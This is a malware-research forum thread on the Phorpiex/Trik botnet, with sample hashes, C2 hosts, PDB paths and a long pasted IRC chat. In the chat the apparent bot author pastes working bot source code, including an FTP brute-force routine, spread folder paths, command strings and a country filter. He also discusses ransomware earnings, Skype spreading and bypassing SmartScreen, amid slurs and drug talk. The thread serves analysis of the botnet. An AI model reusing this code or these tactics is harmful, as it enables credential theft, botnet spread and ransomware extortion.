Win32/Phorpiex (alias Phokace, Trik)

Forum for analysis and discussion about malware.
User avatar
EP_X0FF
Global Moderator
Posts: 4860
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Win32/Phorpiex

Post by EP_X0FF » Mon Mar 11, 2013 1:02 pm

There no even overlay in this file.

eSafe? Well, sort of legalized FakeAV.
Ring0 - the source of inspiration

hnpl2011
Posts: 48
Joined: Mon Jan 24, 2011 8:53 am

Re: Win32/Phorpiex

Post by hnpl2011 » Tue Apr 02, 2013 9:49 am

Spame email: Win32/Phorpiex
Md5: 878e76348466d06e66e18312dce8519a
Virustotal: https://www.virustotal.com/en/file/6b15 ... /analysis/
You do not have the required permissions to view the files attached to this post.

User avatar
EP_X0FF
Global Moderator
Posts: 4860
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Win32/Phorpiex

Post by EP_X0FF » Sun Apr 07, 2013 8:20 am

AutoIt injector with Phorpiex inside. Original + extracted bot in attach.

SHA256: 8b4a7900c0aea9b83c45cab5fcdbbbe5dfb93fc6d4ac8c2cc44e98a8d64cde36
SHA1: 4b8404aa1a7ab4bbaa43fc27446de22878256189
MD5: 2034011ec8ef236e19b6ac8cae39c4b4

https://www.virustotal.com/en/file/8b4a ... /analysis/

SHA256: 34d5949db15ae075deb45ca0a088dac6a89c2292fe5f39dd3c72f16b55ecfe32
SHA1: 5970532ebbdb5f3d3b8b6120a266ca4d7364cd79
MD5: 3806053871f85ce7e988116b92802545

https://www.virustotal.com/en/file/34d5 ... 365322448/
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration

User avatar
Xylitol
Global Moderator
Posts: 1671
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Win32/Phorpiex

Post by Xylitol » Thu May 02, 2013 9:13 pm

https://www.virustotal.com/fr/file/c802 ... 367529221/
- BOTS.SU ( 92.53.97.25:5050/TCP )
- D65F6G76F65SF.NET ( not recorded, sinkhole possibility )
You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 303
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Apr 13, 2016 7:33 pm

You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1671
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Win32/Phorpiex

Post by Xylitol » Wed May 11, 2016 10:32 am

https://twitter.com/malwrhunterteam/sta ... 8219766785
http://vxvault.net/ViriList.php?IP=60.199.166.121

https://www.virustotal.com/en/file/c6b5 ... 462963018/
unpacked: https://www.virustotal.com/en/file/2780 ... 462962981/

Cancerous conv:

Code: Select all

* SNK (~x@23e86861.11813a15.hsi12.unitymediagroup.de) has joined
<SNK> Hello
<SNK> how are you doin pig )
<SNK> long time no see ya
<SNK> Visit Landing: 6981
<SNK> Number of payments: 55
<Pig> haaahahahahhahaahahahaa
<SNK> CRV: 0.79%
<SNK> CRI: 0.43%
<SNK> Profit: 15.0276 ( 6788.44$)
<Pig> hahahahahahahahahaaa u mad ?
<SNK> no no
<SNK> i dont rly care..
<Pig> oh really lol
<Pig> ur trying hard to join crim lol
<Pig> snk the ranswom man
<SNK> all fine with crim
<SNK> dont worry
<Pig> hahahahahaa sure soap every day lol
<Pig> ur next if u dont stop
<SNK> fbi 0day backdoor
<SNK> it was
<SNK> C#
<Pig> still using aspergillus u dumb fuck ?
<Pig> ur not better then burimi lol
<SNK> its not asper, its my bot
<Pig> the stupid albanian
<Pig> yes ur bot lol
<Pig> u never had a bot russki
<SNK> the bot called "Trik"
<Pig> u want tha source u beged me before ?
<Pig> lol
<SNK> since 2008
<Pig> yes trik my dick lol
<SNK> just repimped a bit
<Pig> yes is more protected now
<Pig> but still same shit
<SNK> how protected?
<SNK> lol
<Pig> u dont have the brain for high level lol
<Pig> steganos live encryption ?
<Pig> hahahahahahaa
<SNK> enough to make some money
<Pig> with ransom ?
<Pig> do they pay u for real ?
<SNK> sure see above
<Pig> 55 in 6k
<SNK> shits poppin
<Pig> this is not to much
<SNK> ohhh
<SNK> mate
<SNK> for mix it is...
<SNK> lol
<Pig> hahahaaha ur bot sucks
<SNK> why?
<Pig> it spawns 20 processes
<Pig> like diarhee
<SNK> char *szPaths[] =
<SNK> {
<SNK>  "\\public_html",
<SNK>  "\\htdocs",
<SNK>  "\\httpdocs",
<SNK>  "\\wwwroot",
<Pig> even wine lol
<SNK>  "\\ftproot",
<SNK>  "\\share",
<SNK>  "\\income",
<SNK>  "\\upload",
<SNK>  "\\warez"
<SNK> };
<SNK> good stuff
<Pig> u copy ur bot in these folders lol
<Pig> hahahahaha what a lame
<SNK> )))
<SNK> ya
<SNK> OBAMADEAD.JPG.exe
<Pig> haahahahahahaa
<SNK> like in da old times
<Pig> still not bad
<Pig> u keep trying hard
<Pig> is the server down allready ?
<SNK> never gonna happen
<SNK> try
<SNK> )
<Pig> just wait is question of time
<SNK> https://www.youtube.com/watch?v=s-t1tifeImw xylitol listen i think you like such music
<SNK> ok
<Pig> alot of hf heckers are behind u
<Pig> hahahahhahahahaaa
<SNK> server is up over 3 years
<SNK> lol
<Pig> now got raped lol
<SNK> ok!
<Pig> how many bots inside ?
<Pig> 20k my estimation
<Pig> lol
<SNK> https://www.youtube.com/watch?v=s-t1tifeImw listen better pig
<SNK> nice music and relax
<SNK> )
<Pig> hahhahahahha
<Pig> im relaxed
<SNK> red wine again?
<Pig> always
<Pig> this time
<SNK> i build from like 50 bots
<SNK> old domains
<SNK> wasnt active some time
<SNK> was fucking bitches in prag
<Pig> haahahhahahahaa
<SNK> and playing casino
<SNK> ya..
<Pig> xylitol shoow him the videos from swat in russia lol
<Pig> theyre very relaxing
<SNK> something that you cant afford with your blog, pig.
<Pig> u know why i crated the blog lol
<Pig> ask crim
<Xylitol> hey :)
<Pig> not for the money
<SNK> i know
<SNK> yes
<Pig> m0sad and crim are the reason
<Pig> for the blog lol
<Pig> 2 biggest lamers
<Pig> ever
<Pig> haahahahahaa
<Pig> u still use hacked shells to host ur shit snk
<Pig> ur so weak lol
<SNK> they are from my bruteforcer
<SNK> yes
<Pig> i was pretending u come out with some p2p shit
<Pig> something untracable lol
<Pig> and what i see still aspergillus
<Pig> from iserdo
<SNK> DWORD WINAPI FTP_Brute_Domains(LPVOID param)
<Pig> hahahahahahahahahaha
<SNK> {
<SNK>  FILE *fp;
<SNK>  int socket;
<SNK>  int count;
<SNK>  char buf[1024]; 
<SNK>  char Domain[256];
<SNK>  char login[255];
<SNK>  char pass[255];
<Pig> that's old ftp brutter lol
<SNK>  char result[255];
<SNK>  srand(GetTickCount());
<SNK>  
<SNK>  memset(buf, 0, sizeof(buf));
<Pig> u just add shit to ur bot
<SNK>  memset(Domain, 0, sizeof(Domain));
<SNK>  if(fp = fopen(szSavePath, "r"))  
<SNK>  {
<SNK>   count = 0;
<SNK>    
<SNK>   while (fgets(buf, sizeof(buf), fp) != NULL)
<SNK>   {
<SNK>    count++;
<SNK>    if ((rand() / (float)RAND_MAX) <= (1.0 / count))
<SNK>     strcpy(Domain, buf);
<SNK>   }
<SNK>   chomp(Domain);
<SNK>    
<Pig> lol
<SNK>   if ((socket = Connect(Domain, 21)) > 0)
<SNK>   {
<SNK>    closesocket(socket);
<SNK>    
<SNK>    for (int i = 0; i < (sizeof(szUsersFTP) / sizeof(LPTSTR)); i++)     
<SNK>    {
<SNK>     memset(login, 0, sizeof(login));
<Pig> Xylitol snk the last from darkode lol
<SNK>     strcpy(login, szUsersFTP[i]);
<SNK>     strcat(login, "@");
<SNK>     strcat(login, Domain);
<SNK>     
<SNK>     for (int i = 0; i < (sizeof(szPasswordsFTP) / sizeof(LPTSTR)); i++)     
<SNK>     {
<SNK>      memset(pass, 0, sizeof(pass));
<SNK>      strcpy(pass, szPasswordsFTP[i]);
<SNK>    
<SNK>      if (FTP_Brute(Domain, login, pass) == TRUE)
<SNK>      {      
<SNK>       memset(result, 0, sizeof(result));
<SNK>       sprintf(result, "ftpp://%s:%s@%s", login, pass, Domain);
<SNK>       ReportResult(result, TRUE, FALSE);
<SNK>       Sleep(2000);
<SNK>       
<SNK>       ExitThread(0);
<SNK>      }
<Pig> oki ill save it lol
<SNK>     }
<Pig> ahhahahahahahaa
<SNK>    }
<SNK>   }
<SNK>   fclose(fp);
<SNK>  }
<SNK> https://www.youtube.com/watch?v=6jmZTtFxcUg
<Pig> snk no ddosing anymore ?
<SNK> why would i?
<SNK> but i could yes
<SNK> darkode game over
<SNK> i was invited
<Pig> u always ddosed
<SNK> afer that
<SNK> to "HELL"
<SNK> full of feds
<Pig> haahahahahahaha
<SNK> admin pasting logs to me
<SNK> lol
<Pig> go to opensc now lol
<SNK> idk why even...
<SNK> na
<SNK> i got my opensc on jabber
<SNK> and darkode
<Pig> u still use irc bot 10 years or more old
<Pig> that's a exploit
<Pig> hahahahahahahaa
<SNK> sure i use it, why would i not use it?
<SNK> i simply like it
<SNK> i grew up with that bot
<SNK> i dont care if ppl using http bot
<SNK> its just
<SNK> i want it like that
<SNK> ok?
<SNK> )
<Pig> haaahaahaha
<Pig> u dont want to come to brussels anymore or pay a hitman to clean me out ?
<Pig> hahahahahahahhahahahahahaahaa
<SNK> ))
<Pig> like crim lol
<SNK> no no
<Pig> ah thnx
<SNK> how crim was busted you know that?
<Pig> he was a big lamer
<SNK> shit he has 2 kids
<Pig> same way as iserdo lol
<Pig> they were both idiots
<SNK> i doubt he would ever connect with real ip or something
<SNK> but
<SNK> he
<SNK> said he is in sweden often
<Xylitol> Gudmunds
<SNK> and such stuff
<Pig> no they got him from payments lol
<Pig> Xylitol yes crim is now sucking black dick lol
<SNK> 30 years in jail now?
<Pig> mafi my ass lol
<Pig> hahahahahahaha
<Pig> snk no he's a snitch
<Pig> crim was always a whore lol
<SNK> http://1.bp.blogspot.com/-3eXgR-nXNYQ/VdsaWSoqhUI/AAAAAAAAA8I/wnyMb5128gs/s1600/Gudmunds.jpg
<SNK> sexy guy fo sho
<Pig> remember when i said to him ill fuck ur wife
<Pig> hahahahahhaahahhahahaaha
<Pig> crim raged alot lol
<SNK> xylitol how to rape smartscreen @ W10? ))
<SNK> got few W8
<SNK> not W10
<Xylitol> unistall w10 and install gentoo (:
<SNK> i thought about fucking just send file over skype to all lol
<SNK> but im not done right now with that
<SNK> sendmessage is fucked also on skype api so i use my little trick to make it work
<SNK> zoneidentifier removed and then send to all contacts i think would work?
<SNK> lol
<SNK> from 10 bots CN / TW
<SNK> was outbreak yestarday
<SNK> i wanted to sleep
<SNK> and then i check my comp
<SNK> oh shit
<SNK> lol
<SNK> they just sleep now
<SNK> india goin
<SNK> i was banned from DK anyways
<SNK> long time ago
<SNK> sp3c as admin lol
<SNK> fuck that shit i said
<SNK> and parabola
<SNK> never he ever fucking coded anything
<SNK> sp3c bought bots from me
<SNK> 50k daily TH
<SNK> lol
<Pig> hahahahaha
<Pig> parabola dhe albanian lamer
<Pig> same as burimi lol
<SNK> parabola is amipig no?
<SNK> xylitol you heard about "HELL"?
<SNK> in tor
<Pig> dont know but his name was jeton or something lol
<SNK> and giving me
<SNK> shitload of dumps
<SNK> i ask him
<SNK> why?
<SNK> he is telling me that he needs me more
<SNK> than anything
<SNK> lol
<SNK> it was the admin
<SNK> xylitol its the new "darkode"
<Xylitol> oh
<Xylitol> i think i've saw it lol
<SNK> )
<Pig> u dont have the onion adres snk ?
<SNK> Trickster i seen there too
<SNK> no longer no
<SNK> the one from trojanforge
<SNK> but it sux anyways
<SNK> nothing special there
<SNK> maybe few cool ppl..
<Pig> trojanforge
<Pig> haahahahh BUNN the snitch
<Xylitol> darkode5vqwi4koz.onion/ucp.php?mode=register
<SNK> lol
<SNK> i been there too
<Pig> ah oui xylitol je me rapelles lol
<SNK> i left that shit
<SNK> something cool like the orig darkode never will exist again
<Xylitol> darkode was really lame
<SNK> not at the beginning
<Xylitol> private section filled with public stuff
<Xylitol> ngrbot and shit
<SNK> well yea compared to something like exploit.in it sure was lame
<Pig> darkode was cool when iserdo crated the forum
<Pig> when lamers like crim
<Pig> joined
<Xylitol> lol i can tell you the level1 zone of exploit.in is lame like darkode
<Pig> fubar
<Pig> Xylitol true
<Pig> theyre all same shit
<SNK> on exploit.in i made around 35k$ in 15 days with old net just selling installs
<Xylitol> best topics are copy-paste from public forums
<SNK> lol
<SNK> maybe one day i create some board
<SNK> nothing that has been seen before
<SNK> )
<Pig> xylitol like rohitab
<Pig> or other public russian boards
<Xylitol> related to your bot i've saw the pdb path :)
<Pig> lol
<Xylitol> C:\Users\s\Desktop\Home\Code\Trik v2.5\Release\Trik.pdb
<Pig> trik v 2.5
<SNK> yes
<Pig> hahahahahahahaha
<SNK> true story )
<SNK> Skyplex too?
<Xylitol> you want the unpacked pig?
<SNK> no he wont
<SNK> )
<Pig> yes xyli
<SNK> no
<SNK> no
<SNK> no
<SNK> no
<Pig> je vais jouer avec hex
<Pig> lol
<Pig> envois le moi Xylitol lol
<SNK> its ok xylitol
<SNK> give it away
<SNK> i understand you
<SNK> and im not mad about it
<SNK> )
<Xylitol> http://[redacted]@samples.cybercrime-tracker.net/27802c8663611bf528bc5ba1018178e541fd8a08d3ba3a4b7a2fb5181b7120a4.zip
<SNK> pass is infected, pig
<SNK> )
<SNK> well yea
<SNK> not bad
<SNK> you got my respect xylitol compared to pig
<SNK> )
<Pig> hahahahahhahaahahahahah u mad ?
<SNK> no
<SNK> cos of you
<SNK> now
<SNK> ransom is loaded
<SNK> i swear
<SNK> lol
<SNK> just, cos of, you.
<Pig> ur mad i can feel it
<Pig> hahahhahhahahahahahahahahahaha
<SNK> feel free to use it
<SNK> i give you bots if you want
<SNK> there is no good autospread
<SNK> i didn finish the dropper
<SNK> for usb
<SNK> my old mate got 1 m bots
<SNK> only from usb
<SNK> well total over 1 m
<SNK> daily like 30k
<Pig> lol
<SNK> https://blogs.technet.microsoft.com/mmpc/2013/02/27/the-strange-case-of-gamarue-propagation/
<SNK> they ya go
<SNK> thats leet man
<SNK> he always had the best stuff
<Pig> trik to will be famous now
<SNK> https://www.zscaler.com/blogs/research/irc-botnets-alive-effective-evolving
<SNK> )
<SNK> trik = phorpiex
<SNK> check it
<Pig> same as aspergillus
<SNK> lol
<SNK> yea 100% exactly same
<SNK> just renamed
<SNK> https://www.youtube.com/watch?v=sbR_quuteeY#t=2m
<Pig> snk give commands lol
<Pig> ill connect them here
<SNK> char cmd_download[]   = "d";
<SNK> char cmd_join[]    = "j";
<SNK> char cmd_sort[]    = "s";
<SNK> char cmd_syn[]    = "f";
<SNK> char cmd_suicide[]   = "rmrf";
<SNK> oh
<SNK> you can sort by
<SNK> admin / user
<SNK> syslang
<SNK> os
<SNK> etc
<SNK>   char *szCIS[] =
<SNK>     {
<SNK>      "AM","AZ","BY","GE","KZ","KG","MD","RU","TJ","TM","UZ","UA"
<SNK>     };
<SNK> filter for that lol
<Pig> haahahahhaa
<SNK> `|USA|W7|64|A|yqejoeeh (x@atlantic480.us.unmetered.com) joined #t
<SNK> · `|USA|XP|32|A|lozlyjra (x@cz.tor-exit.neelc.org) joined #t
<SNK> damn
<SNK> stop that shit pls
<SNK> lol
<Pig> hahahahaaha is not me
<Pig> theyre like 3k per day on the blog lol
<SNK> 1.5k is you
<SNK> )
<Pig> hahahahahahahahahhaahhaaha
<SNK> 2.8 with xyl
<Pig> no i dont open the blog like before
<SNK> so before was 1.5k for you? )
<Pig> no
<Pig> before i looked more into it
<Pig> the other guy was also after u
<Pig> he desapeared to much stydy lol
<Pig> study
<SNK> see pig im not mad about you and your "work" but its just lame, compared to xyli work, we know that both
<SNK> its just waste of time
<Pig> who's comparing to xylitol here who's that fagot ?
<Pig> hahahahahahahaa
<SNK> lol
<Pig> he's unique snk lol
<SNK> fagot
<Pig> dont even try lol
<SNK> he got my respect for his work, cuz he is knowing what he is doing, you no, never.
<SNK> remember the code i fixed for you?
<SNK> p2p spreader?
<SNK> lol
<SNK> sure you do
<SNK> fucking running 5 bots
<SNK> idk why
<SNK> i even invited you to my old nets
<SNK> showing you all
<SNK> pls dont tell me, you wouldnt like to have that
<SNK> cuz, as i saw, i dont think so
<SNK> )
<SNK> so pig, pls, find yourself
<Pig> hahahahahhahahahaha
<Pig> ur mad i swear
<SNK> C:\Users\s\Desktop\Home\Code\Trik v2.5\Release\Trik.pdb snk coding area lol.
<SNK> see
<SNK> what is funny about that?
<Pig> hahahahahahahahahaha
<Pig> that raged u ?
<SNK> no
<Pig> if ur so stupid to leave traces everywhere is not my fault lol
<SNK> i simply, dont understand, why you are doing this.
<Pig> i like when u go mad
<SNK> thats the reason?
<Pig> start dossing abjects like u did with other server lol
<SNK> na
<SNK> im old now
<Pig> shoow us ur real nature
<Pig> hahahahahahahaha
<SNK> i got not so much energy
<Pig> ur very bad guy lol
<SNK> i simply make some money, nothing else
<Pig> yes some lol
<SNK> i dont need to proof you anything
<Pig> big money was from crim
<SNK> from crim?
<Pig> but he's now raped by bigzilla dick
<SNK> when why from what?
<Pig> u always were a litle noob snk lol
<Pig> burimi category
<SNK> thats just your little opinion
<SNK> it has no meaning for me, pig
<Pig> pure reality
<SNK> ok )
<Pig> remember that jimyGJ from ryan ?
<SNK> no
<Pig> ur same style
<SNK> alright
<SNK> explain why?
<Pig> bad guy and still lamer not smart lol
<Pig> and i m prety sure ur trik bot
<Pig> is aspergillus remake lol
<SNK> its just the base
<SNK> from it
<Pig> exactly what i say
<SNK> i thought you knew that since 5 years ago or so..
<Pig> ur the same lol
<Pig> u still cant code ur self
<Pig> like crim
<Pig> u remain a fucking thieve nothing more
<SNK> lol
<Pig> like burimi bx1 lol
<Pig> hahahahahaahaahahaa
<Pig> or other heckers lol
<SNK> https://www.youtube.com/watch?v=IcoqJCJlHbQ
<SNK> go and pray in c
<Pig> ill post the bot
<Pig> u beged me before
<Pig> in szone
<Pig> remember ?
<Pig> the source
<SNK> the fixed p2p spread?
<SNK> lol
<Pig> hahahahahhah no no the source
<Pig> u wanted absolutely
<Pig> the private lol
<SNK> ok
<SNK> could be
<SNK> idk
<SNK> i dont care mate
<SNK> times changed alot
<Pig> the one using * wget
<Pig> lol
<SNK> "The net is probably more then 100k botnets" WHAT is THIS?
<SNK> please, pig, cmon
<Pig> hahahahhahahaa
<Pig> in this way alot of researchers will piss u off
<Pig> or ddossers
<SNK> xylitol and thats the guys you hand around? come to me i invite you to some good coke and nice hoes
<Pig> hahahahahaahahahahahahahaa u maad ?
<SNK> nana its just funny
<SNK> more then 100k botnets
<SNK> more than 100k bots
<Pig> ur funny to but ur real natyre is more funny lol
<SNK> would do the job
<SNK> more than 100k bots
<SNK> 100k botnets
<SNK> lol
<SNK> oh shit
<SNK> pig
<SNK> fuck
<SNK> omg
<SNK> ))
<Pig> ill fix it haahaha
<SNK> do it pls
<Pig> in a moment lol
<SNK> https://www.youtube.com/watch?v=n08d9HhcCxY
<SNK> feel free to send abuse also
<SNK> like spamhaus did before
<Pig> i never did it
<Pig> it was the other guy lol
<Pig> i post ur info
<Pig> hahahahaha
<Pig> he wanted u to rage more
<SNK> i fucking win the 3 worldwar with vietnam bots agains USA with ransomware
<SNK> lol
<SNK> they just send some mails
<SNK> ))
<Pig> bitcoin payments ?
<SNK> what else
<Pig> paysafe
<Pig> ukash lol
<Pig> what u accept for ransom only bitcoin ?
<Pig> they can track u
<SNK> http://img4.picload.org/image/rgoaipwa/wc.png
<SNK> i seen 16k$ from 1k USA installs
<SNK> or better biz US
<SNK> 10k$ for decryptor
<SNK> https://www.youtube.com/watch?v=s-t1tifeImw
* SNK has quit (Client closed connection)
* SNK (~x@20db5883.1c25dec6.dynamic.kabel-deutschland.de) has joined
<SNK> wb
<Pig> i thought u sleept
<SNK> sometimes
<SNK> VPN not worked
<SNK> had to join with real ip now
<Pig> ahahahahaha vpn lol
<Pig> like u use them
<SNK> hopefully you wont report
<SNK> no i dont
<SNK> )
<Pig> no the bad thing is done now
<Pig> ur botnet is enough lol
<SNK> 0.98
<SNK> just got payment again
<SNK> enough for good coke
<Pig> haahahahahaha
<Pig> snif it kurva lol
<SNK> i srs got tired
<SNK> of exchanging money
<SNK> i like to sleep
<Pig> Pageviews today
<Pig> 3,431
<Pig> on the blog lol
<Xylitol> snk, your music remind me a bit Vitalic
<SNK> vitalic yes is good
<SNK> but other is more minimal
<SNK> nathan fake is
<SNK> unique
<SNK> https://www.youtube.com/watch?v=sCWhWF-UUo0
<SNK> https://www.youtube.com/watch?v=d7zBePUZMog#t=3m50s
<SNK> for me that sound is more than unique
<SNK> thats why oxia and like 10 other made remix of it
<SNK> music that touches your deepest corner of your soul
<Pig> ahahaaha
<Pig> like u have one lol
<SNK> not like before sadly
<SNK> good coke helps with that
<Xylitol> don't end up like that ipwn guy
<SNK> he got destroeyd
<SNK> from psychiatrie
<SNK> i know
<SNK> guess from who that china root is? )
<SNK> he still must take neuropeltics i think
<SNK> and i still owe him 600$ or so
<SNK> but i lost contact
<SNK> chemical lobotomy
<Pig> lol
<SNK> https://theyellowbrickroadfreeblog.wordpress.com/2013/01/11/want-a-chemical-lobotomy-take-antidepressants/ check this out
<SNK> https://i1.wp.com/www.jimstonefreelance.com/neurons.gif
<Pig> snk ur brain is also fucked
<SNK> thats like beeing on heroin high
<SNK> for months
<SNK> till all burns out
<SNK> and your soul is gone
<SNK> in frontal lobe
<SNK> for ever
<SNK> I’ve been in an extremely peculiar state for the past 8 months after stopping Wellbutrin/buproprion. I have literally lost everything inside of me and no longer have a sense of “inner being”. My personality has been completely erased, along with the inner psyche I’ve spent a lifetime building. When I attempt to “look inside”, it is impossible because there is literally nothing there.
<SNK> same state i'm in
<SNK> since 2 years
<Pig> iserdo was clean
<SNK> iserdo had coffein overdose always
<Pig> hahahahaha
<SNK> you know that inner monolouge
<SNK> in your head
<SNK> with yourself?
<Pig> i drink coffe much then normal people
<SNK> like your spiritual voice
<Pig> and im still like rock lol
<SNK> of your soul
<Pig> only esspresso
<SNK> or better to say hearing of your thoughts
<Pig> Xylitol t'aimes pas le caffe toi ?lol
<SNK> imigine this is gone
<SNK> your inner compas is gone
<Xylitol> j'ai stopé le caffé
<Pig> moi je peux pas Xylitol
<Pig> impossible
<SNK> puta
<Pig> maux de tete
<Pig> hahahahhahaha snk ur Trik bot is gone to
<SNK> na
<SNK> rly dont think so
<Pig> Xylitol 2 esspresso chaque jour si non je suis nerveux bcp
<SNK> mr. pig
<Pig> snk this version yes
<Pig> time to think abt p2p
<Pig> now
<Pig> if u can make it
<SNK> i had few offer for this once but wasnt rly interesting
<SNK> i dont plan to infect millions of pcs
<SNK> around 30k$ or so was the offer
<SNK> p2pbot core with some modules
<SNK> from some guy who use them to spam and earn like 20k$ daily
<SNK> with pharma
<Pig> nobody will give u p2p bot lol
<SNK> why give? you got to buy it
<SNK> like i said
<SNK> like 30k$
<SNK> its still not much
<Pig> 30k lol
<Pig> why dont u Trik iserdos base ?
<Pig> the x-rat lol
<Pig> and add the udp protocol
<Pig> like in butterfly
<Pig> u cant do it lol
<SNK> i no longer got the energy to creat something good
<SNK> i had
<SNK> with pills
<SNK> that fucked me up
<Pig> lol
<SNK> i had no energy to exchange 20k$
<SNK> it took me like half hour
<SNK> you simply get tired
<Pig> haahhaahhahahahahaha
<Pig> so modest lol
<SNK> https://www.youtube.com/watch?v=h2vkUozM3OM
<Pig> snk skype spread to ?
<Pig> via send file or just mesage ?
<SNK> where?
<Pig> Trik
<SNK> no
<Pig> ill see lol
<SNK> time to drink beer again
<SNK> prost
<SNK> let me present my work to cerber
<SNK> then i work with da boss toghetor
<SNK> and spread 20k USA daily
<SNK> then load C E R B E R
<Pig> hahaahah cerber got raped to
<SNK> ok
<SNK> ok
<SNK> )
<SNK> https://www.youtube.com/watch?v=n71yya5JDxw#t=35s
<Pig> have good night paruski covek
<Pig> Xylitol bonne nuit a++++
<Pig> snk join here more dont desapear lol
* Pig has quit (Read error: Input/output error)
You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 303
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sat Apr 08, 2017 6:51 pm

You do not have the required permissions to view the files attached to this post.

User avatar
EP_X0FF
Global Moderator
Posts: 4860
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Malware collection

Post by EP_X0FF » Mon Jan 07, 2019 8:57 am

Trik v2.7

Code: Select all

C:\Users\s\Desktop\Home\Code\Trik v2.7 - Work\Release\Trik.pdb  
Phorpiex spam bot under dotnet obfuscator. Completely unpacked in attach.

Posts moved.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration

Post Reply